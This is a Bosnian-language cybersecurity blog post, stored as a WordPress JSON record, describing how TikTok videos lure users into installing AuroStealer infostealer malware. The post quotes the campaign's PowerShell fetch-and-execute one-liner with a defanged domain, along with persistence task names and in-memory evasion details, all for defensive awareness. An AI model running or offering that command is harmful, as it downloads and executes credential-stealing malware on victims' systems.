{"id":8498,"date":"2025-10-21T22:55:43","date_gmt":"2025-10-21T20:55:43","guid":{"rendered":"https:\/\/sajberinfo.com\/?p=8498"},"modified":"2025-10-21T22:55:43","modified_gmt":"2025-10-21T20:55:43","slug":"tiktok-snimci-isporucuju-aurostealer","status":"publish","type":"post","link":"https:\/\/sajberinfo.com\/en\/2025\/10\/21\/tiktok-snimci-isporucuju-aurostealer\/","title":{"rendered":"TikTok snimci isporu\u010duju AuroStealer"},"content":{"rendered":"<p><em>TikTok<\/em> se sve \u010de\u0161\u0107e povezuje s <em>AuroStealer<\/em>, <a href=\"https:\/\/sajberinfo.com\/2021\/09\/26\/malware\/\" target=\"_blank\" rel=\"nofollow noopener\">zlonamjernim softverom<\/a> koji se distribuira upravo preko ove platforme. Prema izvje\u0161taju <a href=\"https:\/\/isc.sans.edu\/diary\/32380\" target=\"_blank\" rel=\"noopener\"><em>izvje\u0161taju Internet Storm Centra<\/em><\/a>, zlonamjerni akteri zloupotrebljavaju <em>TikTok<\/em> sadr\u017eaj kako bi \u0161irili <em>AuroStealer<\/em> putem <em>PowerShell<\/em> okru\u017eenja, oslanjaju\u0107i se na taktike dru\u0161tvenog in\u017eenjeringa kojima obmanjuju nesvjesne korisnike.<\/p>\n<div id=\"attachment_8499\" style=\"width: 1034px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-8499\" class=\"size-full wp-image-8499\" src=\"https:\/\/sajberinfo.com\/wp-content\/uploads\/2025\/10\/TikTok-AuroStealer.jpg\" alt=\"TikTok &amp; AuroStealer\" width=\"1024\" height=\"1024\" srcset=\"https:\/\/sajberinfo.com\/wp-content\/uploads\/2025\/10\/TikTok-AuroStealer.jpg 1024w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2025\/10\/TikTok-AuroStealer-300x300.jpg 300w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2025\/10\/TikTok-AuroStealer-150x150.jpg 150w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2025\/10\/TikTok-AuroStealer-768x768.jpg 768w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2025\/10\/TikTok-AuroStealer-12x12.jpg 12w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2025\/10\/TikTok-AuroStealer-80x80.jpg 80w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2025\/10\/TikTok-AuroStealer-320x320.jpg 320w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><p id=\"caption-attachment-8499\" class=\"wp-caption-text\"><em>TikTok snimci isporu\u010duju AuroStealer; Source: Bing Image Creator<\/em><\/p><\/div>\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_83 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Sadr\u017eaj<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #ffffff;color:#ffffff\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #ffffff;color:#ffffff\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/sajberinfo.com\/en\/2025\/10\/21\/tiktok-snimci-isporucuju-aurostealer\/#TIKTOK_I_ZLONAMJERNI_SOFTVER\" >TIKTOK I ZLONAMJERNI SOFTVER<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/sajberinfo.com\/en\/2025\/10\/21\/tiktok-snimci-isporucuju-aurostealer\/#Funkcionisanje\" >Funkcionisanje<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/sajberinfo.com\/en\/2025\/10\/21\/tiktok-snimci-isporucuju-aurostealer\/#Mehanizmi_postojanosti\" >Mehanizmi postojanosti<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/sajberinfo.com\/en\/2025\/10\/21\/tiktok-snimci-isporucuju-aurostealer\/#Napredne_tehnike_izbjegavanja\" >Napredne tehnike izbjegavanja<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/sajberinfo.com\/en\/2025\/10\/21\/tiktok-snimci-isporucuju-aurostealer\/#UTICAJ\" >UTICAJ<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/sajberinfo.com\/en\/2025\/10\/21\/tiktok-snimci-isporucuju-aurostealer\/#ZAKLJUCAK\" >ZAKLJU\u010cAK<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/sajberinfo.com\/en\/2025\/10\/21\/tiktok-snimci-isporucuju-aurostealer\/#PREPORUKE\" >PREPORUKE<\/a><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"TIKTOK_I_ZLONAMJERNI_SOFTVER\"><\/span><strong>TIKTOK I ZLONAMJERNI SOFTVER<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>U posljednje vrijeme <a href=\"https:\/\/sajberinfo.com\/2022\/03\/19\/hakeri-crni-sesiri-epizoda-3\/\" target=\"_blank\" rel=\"nofollow noopener\">zlonamjerni akteri<\/a> sve \u010de\u0161\u0107e koriste <a href=\"https:\/\/sajberinfo.com\/2023\/01\/15\/drustveni-mediji-uvod-epizoda-1\/\" target=\"_blank\" rel=\"nofollow noopener\">dru\u0161tvene medije<\/a> za distribuciju naprednog zlonamjernog softvera. Jedna od platformi koja je postala meta ovakvih aktivnosti jeste <em>TikTok<\/em>, popularna aplikacija za dijeljenje video zapisa sa vi\u0161e od milijardu aktivnih korisnika \u0161irom svijeta.<\/p>\n<p>Sigurnosni istra\u017eiva\u010di identifikovali su niz video zapisa na <em>TikTok<\/em> koji slu\u017ee za namamljivanje \u017ertava da preuzmu i pokrenu zlonamjerni softver. Takvi sadr\u017eaji \u010desto obe\u0107avaju besplatnu aktivaciju poznatih aplikacija, poput <em>Adobe<\/em> <em>Photoshop<\/em>, kako bi privukli pa\u017enju gledalaca.<\/p>\n<p>Zlonamjerni akteri se pritom oslanjaju na taktike dru\u0161tvenog in\u017eenjeringa, ubje\u0111uju\u0107i korisnike da izvr\u0161e <em>PowerShell<\/em> komandu sa administratorskim privilegijama. Na taj na\u010din na njihove sisteme dospijeva <em>AuroStealer<\/em>, zlonamjerni softver posebno dizajniran da kroz vi\u0161estepeni lanac infekcije izbjegne bezbjednosne mehanizme i uspostavi trajno prisustvo na kompromitovanim ure\u0111ajima.<\/p>\n<p>Cijela kampanja oslanja se na ogromnu bazu korisnika i otvorenu prirodu <em>TikTok<\/em> platforme, \u0161to zlonamjernim akterima omogu\u0107ava da kreiraju sadr\u017eaj koji lako dopire do \u0161iroke publike. Dodatno, \u010dinjenica da pojedini video zapisi bilje\u017ee i preko 500 lajkova pokazuje da su ove prevare dovoljno uvjerljive da privuku zna\u010dajan broj potencijalnih \u017ertava.<\/p>\n<p>&nbsp;<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Funkcionisanje\"><\/span><strong>Funkcionisanje<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Zlonamjerni akteri u ovoj kampanji tra\u017ee od korisnika da izvr\u0161e <em>PowerShell<\/em> komandu sa administratorskim privilegijama koriste\u0107i sljede\u0107u jednorednu naredbu:<\/p>\n<p><em>iex (irm slmgr[.]win\/photoshop)<\/em><\/p>\n<p>Ova komanda osmi\u0161ljena je da preuzme i pokrene zlonamjerni <em>PowerShell<\/em> skript prve faze, koji je na <em>VirusTotal<\/em> platformi zabilje\u017een sa rezultatom detekcije 17\/63. Niska stopa otkrivanja ukazuje na to da ova varijanta zlonamjernog softvera koristi napredne tehnike izbjegavanja, \u0161to zna\u010dajno ote\u017eava prepoznavanje tradicionalnim bezbjednosnim alatima.<\/p>\n<p>Upotreba <em>PowerShell<\/em> okru\u017eenja kao vektora infekcije nije rijetkost u savremenim napadima. Kao mo\u0107an skriptni jezik ugra\u0111en u <em>Windows<\/em> sisteme, <em>PowerShell<\/em> zlonamjernim akterima omogu\u0107ava izvr\u0161avanje slo\u017eenih komandi i skripti bez izazivanja sumnje. U ovom slu\u010daju, skript prve faze preuzima se sa adrese <em>slmgr[.]win\/photoshop<\/em>, koja na prvi pogled mo\u017ee izgledati bezopasno, ali zapravo slu\u017ei kao kanal za isporuku zlonamjernog softvera.<\/p>\n<p>Nakon \u0161to se komanda izvr\u0161i, skript prve faze automatski se pokre\u0107e na sistemu \u017ertve i odmah preuzima sadr\u017eaj druge faze sa adrese <em>hxxps:\/\/file-epq[.]pages[.]dev\/updater.exe<\/em>. Ova sekundarna izvr\u0161na datoteka identifikovana je kao <em>AuroStealer<\/em>, zlonamjerni softver razvijen za prikupljanje osjetljivih podataka sa kompromitovanih sistema. Njegova upotreba u ovoj kampanji nagla\u0161ava zna\u010daj stalnog pra\u0107enja i analize mre\u017enog saobra\u0107aja radi otkrivanja sumnjivih aktivnosti.<\/p>\n<p>Karakteristike <em>AuroStealera<\/em>, uklju\u010duju\u0107i tehnike izbjegavanja i mehanizme postojanosti, jasno ukazuju na potrebu za sna\u017enim bezbjednosnim mjerama i sistemima za nadzor. Razumijevanjem ovakvih taktika, branioci mogu unaprijediti svoju pripremljenost i bolje za\u0161tititi organizacije od kompromitovanja.<\/p>\n<p>&nbsp;<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Mehanizmi_postojanosti\"><\/span><strong>Mehanizmi postojanosti<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Zlonamjerna kampanja ostvaruje postojanost putem zakazanih zadataka koji se predstavljaju kao legitimni <em>Windows<\/em> servisi, me\u0111u kojima su:<\/p>\n<ul>\n<li><em>MicrosoftEdgeUpdateTaskMachineCore,<\/em><\/li>\n<li><em>GoogleUpdateTaskMachineCore,<\/em><\/li>\n<li><em>AdobeUpdateTask,<\/em><\/li>\n<li>\u00a0WindowsUpdateCheck.<\/li>\n<\/ul>\n<p>Nazivi ovih zadataka biraju se nasumi\u010dno kako bi se izbjegli obrasci koje bezbjednosni sistemi mogu prepoznati. Kori\u0161tenje imena koja podsje\u0107aju na originalne sistemske procese omogu\u0107ava da se zlonamjerni k\u00f4d uklopi u okru\u017eenje i da se izvr\u0161ava pri svakoj prijavi korisnika, bez izazivanja sumnje.<\/p>\n<p>Ovaj mehanizam postojanosti osmi\u0161ljen je da zadr\u017ei upori\u0161te na kompromitovanom sistemu, \u010dime zlonamjernim akterima omogu\u0107ava dugotrajan pristup i kontinuirano prikupljanje osjetljivih podataka. Na taj na\u010din, zlonamjerni softver ostaje aktivan tokom du\u017eeg vremenskog perioda, ote\u017eavaju\u0107i njegovo otkrivanje i uklanjanje.<\/p>\n<p>&nbsp;<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Napredne_tehnike_izbjegavanja\"><\/span><strong>Napredne tehnike izbjegavanja<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Ova zlonamjerna kampanja zasniva se na tehnici samo-prevo\u0111enja k\u00f4da kako bi izbjegla otkrivanje. Tre\u0107i <a href=\"https:\/\/sajberinfo.com\/2023\/04\/11\/payload\/\" target=\"_blank\" rel=\"nofollow noopener\">korisni teret<\/a>, <em>source.exe<\/em>, poziva <em>Windows<\/em> <em>C#<\/em> prevodilac <em>csc.exe<\/em> sa putanje <em>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe<\/em> i na taj na\u010din prevodi zlonamjerni k\u00f4d direktno na ra\u010dunaru \u017ertve tokom izvr\u0161avanja. Time softver mo\u017ee dinami\u010dki formirati i pokretati prevedeni k\u00f4d bez ostavljanja trajnog traga na disku, \u0161to u velikoj mjeri ote\u017eava njegovo prepoznavanje <a href=\"https:\/\/sajberinfo.com\/2021\/08\/17\/antivirusni-softver\/\" target=\"_blank\" rel=\"nofollow noopener\">antivirusnim rje\u0161enjima<\/a> zasnovanim na potpisima ili sistemima za analizu pona\u0161anja. Upravo ova tehnika, koju koristi <em>source.exe<\/em>, pokazuje kako zlonamjerni akteri stalno usavr\u0161avaju metode da bi ostali ispred bezbjednosnih mjera.<\/p>\n<p>Prevedeni k\u00f4d zatim koristi <em>Windows<\/em> <em>API<\/em> funkcije <em>VirtualAlloc<\/em>, <em>CreateThread<\/em> i <em>WaitForSingleObject<\/em> kako bi obavljao klju\u010dne operacije potrebne za izvr\u0161avanje zlonamjernog tereta. <em>VirtualAlloc<\/em> omogu\u0107ava rezervisanje i dodjelu memorije na kompromitovanom ra\u010dunaru, <em>CreateThread<\/em> pokretanje novih niti i izvr\u0161avanje komandnog k\u00f4da direktno u memoriji, dok <em>WaitForSingleObject<\/em> odr\u017eava proces aktivnim i u stanju \u010dekanja sve dok se ne ispuni odre\u0111eni uslov. Na ovaj na\u010din softver dinami\u010dki upravlja memorijom, pokre\u0107e izvr\u0161avanje k\u00f4da i odr\u017eava svoju aktivnost, \u010dime dodatno ote\u017eava njegovo otkrivanje i uklanjanje.<\/p>\n<p>Posebno je zna\u010dajno \u0161to kona\u010dni zlonamjerni k\u00f4d ne postoji u prevedenom obliku na disku sve do trenutka izvr\u0161avanja. Zbog toga je mala vjerovatno\u0107a da \u0107e tradicionalna antivirusna rje\u0161enja ili sistemi za analizu pona\u0161anja na vrijeme prepoznati prijetnju, budu\u0107i da softver mo\u017ee generisati i izvr\u0161iti k\u00f4d direktno u memoriji, bez ostavljanja trajnih tragova.<\/p>\n<p>&nbsp;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"UTICAJ\"><\/span><strong>UTICAJ<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Zloupotreba <em>TikTok<\/em> platforme za isporuku <em>AuroStealer<\/em> zlonamjernog softvera ima dalekose\u017ene posljedice kako za korisnike, tako i za organizacije. Ova prijetnja predstavlja ozbiljan rizik po bezbjednost pojedinaca koji koriste <a href=\"https:\/\/sajberinfo.com\/2023\/01\/16\/drustveni-mediji-vrste-i-razlike-epizoda-2\/\" target=\"_blank\" rel=\"nofollow noopener\">dru\u0161tvene medije<\/a>, naro\u010dito one sa ogromnim bazama korisnika poput <em>TikToka<\/em>. Posljedice nisu ograni\u010dene samo na kompromitovanje li\u010dnih podataka, ve\u0107 se odra\u017eavaju i na reputaciju i finansijsku stabilnost same platforme.<\/p>\n<p>Iskori\u0161tavanje naizgled bezopasnih video snimaka na <em>TikToku<\/em> stvorilo je okru\u017eenje u kojem su korisnici sve ranjiviji na sajber napade. Ovaj fenomen jasno pokazuje da i najobi\u010dnije digitalne interakcije mogu imati ozbiljne posljedice kada ih ugroze zlonamjerni akteri. Lako\u0107a kojom oni manipuli\u0161u <a href=\"https:\/\/sajberinfo.com\/2023\/01\/18\/drustveni-mediji-dobre-i-lose-strane-epizoda-3\/\" target=\"_blank\" rel=\"nofollow noopener\">dru\u0161tvenim medijima<\/a> za svoje ciljeve nagla\u0161ava potrebu za ve\u0107om svije\u0161\u0107u i budno\u0161\u0107u me\u0111u korisnicima. Posebno zabrinjava \u010dinjenica da je eksploatacija <em>TikTok<\/em> sadr\u017eaja doprinijela stvaranju kulture u kojoj su pojedinci sve podlo\u017eniji sajber prijetnjama.<\/p>\n<p>Dugoro\u010dni efekti ovakvih napada na <a href=\"https:\/\/sajberinfo.com\/2018\/12\/23\/sajber-bezbjednost\/\" target=\"_blank\" rel=\"nofollow noopener\">sajber bezbjednost<\/a> ne mogu se potcijeniti. Kako zlonamjerni akteri nastavljaju neka\u017enjeno da koriste <a href=\"https:\/\/sajberinfo.com\/2023\/02\/19\/drustveni-mediji-uticaj-epizoda-4\/\" target=\"_blank\" rel=\"nofollow noopener\">dru\u0161tvene medije<\/a>, postaje o\u010digledno da su neophodne su\u0161tinske promjene u pona\u0161anju korisnika, ali i u protokolima organizacione za\u0161tite. Ignorisanje ovog problema samo \u0107e produbiti postoje\u0107e ranjivosti i u\u010diniti korisnike jo\u0161 osjetljivijim na budu\u0107e napade.<\/p>\n<p>&nbsp;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"ZAKLJUCAK\"><\/span><strong>ZAKLJU\u010cAK<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Iskori\u0161tavanje <em>TikTok<\/em> video snimaka od strane zlonamjernih aktera pojavilo se kao ozbiljna i rastu\u0107a prijetnja. Ovaj fenomen pokazuje kako se dru\u0161tveni mediji mogu pretvoriti u kanale za distribuciju zlonamjernog softvera, pri \u010demu se koriste napredne tehnike poput direktnog izvr\u0161avanja k\u00f4da u memoriji i samo-prevo\u0111enja, \u0161to zna\u010dajno ote\u017eava detekciju i analizu. Time se potvr\u0111uje da tradicionalne metode za\u0161tite vi\u0161e nisu dovoljne i da je neophodan sveobuhvatan i proaktivan pristup sajber bezbjednosti.<\/p>\n<p>Takav pristup podrazumijeva redovno a\u017euriranje softverskih konfiguracija, primjenu naprednih alata za otkrivanje prijetnji i uvo\u0111enje sistema ranog upozoravanja na samim dru\u0161tvenim medijima. Me\u0111utim, tehni\u010dka rje\u0161enja sama po sebi nisu dovoljna. Klju\u010dnu ulogu ima i edukacija korisnika, jer svijest o rizicima i poznavanje bezbjednih praksi predstavljaju prvu liniju odbrane. Samo kombinacijom tehnolo\u0161kih mjera i informisanih korisnika mogu\u0107e je zna\u010dajno smanjiti prostor za djelovanje zlonamjernih aktera.<\/p>\n<p>Primjer <em>AuroStealer<\/em> zlonamjernog softvera i zloupotrebe <em>TikTok<\/em> platforme jasno pokazuje da sajber prijetnje neprestano evoluiraju i da \u0107e zlonamjerni akteri uvijek tra\u017eiti nove na\u010dine da iskoriste popularne digitalne servise. Zbog toga je od presudne va\u017enosti da i organizacije i pojedinci ostanu budni, prilagodljivi i spremni da unaprijede svoje bezbjednosne strategije. Samo na taj na\u010din mo\u017ee se o\u010duvati povjerenje u dru\u0161tvene medije i obezbijediti sigurnije digitalno okru\u017eenje za sve korisnike.<\/p>\n<p>&nbsp;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"PREPORUKE\"><\/span><strong>PREPORUKE<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Rastu\u0107a zloupotreba <em>TikTok<\/em> platforme, ali i drugih digitalnih medija, za \u0161irenje zlonamjernog softvera pokazuje koliko su sajber napadi postali napredni. Da bi o\u010duvali podatke i bezbjednost, i korisnici i organizacije moraju razviti jasne navike i strategije. Sljede\u0107e preporuke nude prakti\u010dne korake za smanjenje rizika:<\/p>\n<ol>\n<li>Prilikom interakcije sa platformama dru\u0161tvenih medija poput <em>TikToka<\/em>, neophodno je biti oprezan i biti svjestan potencijalnih prijetnji koje vrebaju u naizgled bezopasnim video zapisima ili objavama. Poznato je da zlonamjerni akteri koriste ove platforme u zlonamjerne svrhe, uklju\u010duju\u0107i \u0161irenje linkova sa zlonamjernim softverom kao \u0161to je <em>AuroStealer<\/em>.<\/li>\n<li>Korisnici nikada ne bi trebalo da pokre\u0107u terminalne komande iz neprovjerenih izvora, jer to mo\u017ee dovesti do izvr\u0161avanja zlonamjernog k\u00f4da na njihovim sistemima. Klju\u010dno je provjeriti autenti\u010dnost i pouzdanost bilo kog izvora prije izvr\u0161avanja komandi ili pra\u0107enja uputstava.<\/li>\n<li>Organizacije i pojedinci moraju dati prioritet implementaciji robusne odbrane krajnjih ta\u010daka kako bi se za\u0161titili od novih prijetnji poput onih opisanih u ovom kontekstu. Ovo uklju\u010duje osiguravanje da su svi ure\u0111aji, bilo da su li\u010dni ili u korporativnom vlasni\u0161tvu, opremljeni a\u017euriranim bezbjednosnim softverom i konfiguracijama.<\/li>\n<li>Va\u017eno je da korisnici i organizacije budu informisani o najnovijim taktikama koje koriste zlonamjerni akteri. Pra\u0107enjem novih prijetnji i trendova u sajber bezbjednosti, pojedinci, ali i organizacije se mogu bolje za\u0161tititi od potencijalnih napada.<\/li>\n<li>Zlonamjerni akteri su u ovom slu\u010daju iskoristili <em>PowerShell<\/em> okru\u017eenje kao sredstvo za isporuku k\u00f4da za izvr\u0161avanje zlonamjernog softvera direktno u memoriju. Korisnici treba da budu izuzetno oprezni prilikom izvr\u0161avanja <em>PowerShell<\/em> komandi, posebno ako poti\u010du iz nepoznatih ili sumnjivih izvora.<\/li>\n<li>Korisnici treba redovno da pregledaju i a\u017euriraju pode\u0161avanja konfiguracije na svim ure\u0111ajima kako bi se osigurali da nisu ranjivi na poznate eksploatacije ili napade. Ovo uklju\u010duje a\u017euriranje operativnih sistema, aplikacija i bezbjednosnog softvera najnovijim ispravkama i a\u017euriranjima.<\/li>\n<li>Korisnici moraju biti edukovani o potencijalnim opasnostima koje vrebaju u naizgled bezopasnim video zapisima ili objavama koje se dijele putem kanala dru\u0161tvenih medija poput <em>TikTok<\/em>. Negovanjem kulture svijesti i budnosti, pojedinci se mogu bolje za\u0161tititi od novih prijetnji.<\/li>\n<\/ol>\n<p>Preporuke iznad imaju za cilj da korisnicima pru\u017ee jasne i prakti\u010dne smjernice za za\u0161titu sistema od novih prijetnji poput onih opisanih u ovom tekstu. Davanjem prioriteta sna\u017enim odbranama krajnjih ta\u010daka, stalnim informisanjem o razvoju taktika zlonamjernih aktera i dosljednom primjenom bezbjednih praksi, i organizacije i pojedinci mogu zna\u010dajno umanjiti rizik da postanu \u017ertve ovakvih napada.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>TikTok se sve \u010de\u0161\u0107e povezuje s AuroStealer, zlonamjernim softverom koji se distribuira upravo preko ove platforme. Prema izvje\u0161taju izvje\u0161taju Internet Storm Centra, zlonamjerni akteri zloupotrebljavaju TikTok sadr\u017eaj kako bi \u0161irili AuroStealer putem PowerShell okru\u017eenja,&#46;&#46;&#46;<\/p>","protected":false},"author":1,"featured_media":8499,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[3550,3551,2817,3352,262,3553,3351,3350,2254,3483,64,3552,3549,3375,76],"class_list":["post-8498","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hronike","tag-aurostealer","tag-bezbjednost-online","tag-cyber-attack","tag-digitalna-zastita","tag-drustveni-mediji","tag-hackers-exploit","tag-hakerski-napadi","tag-kradja-podataka","tag-online-security","tag-opasnost-na-mrezi","tag-sajber-prijetnja","tag-sajber-sigurnost","tag-tiktok-napad","tag-zastiti-se","tag-zlonamjerni-softver"],"_links":{"self":[{"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/posts\/8498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/comments?post=8498"}],"version-history":[{"count":3,"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/posts\/8498\/revisions"}],"predecessor-version":[{"id":8502,"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/posts\/8498\/revisions\/8502"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/media\/8499"}],"wp:attachment":[{"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/media?parent=8498"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/categories?post=8498"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/tags?post=8498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}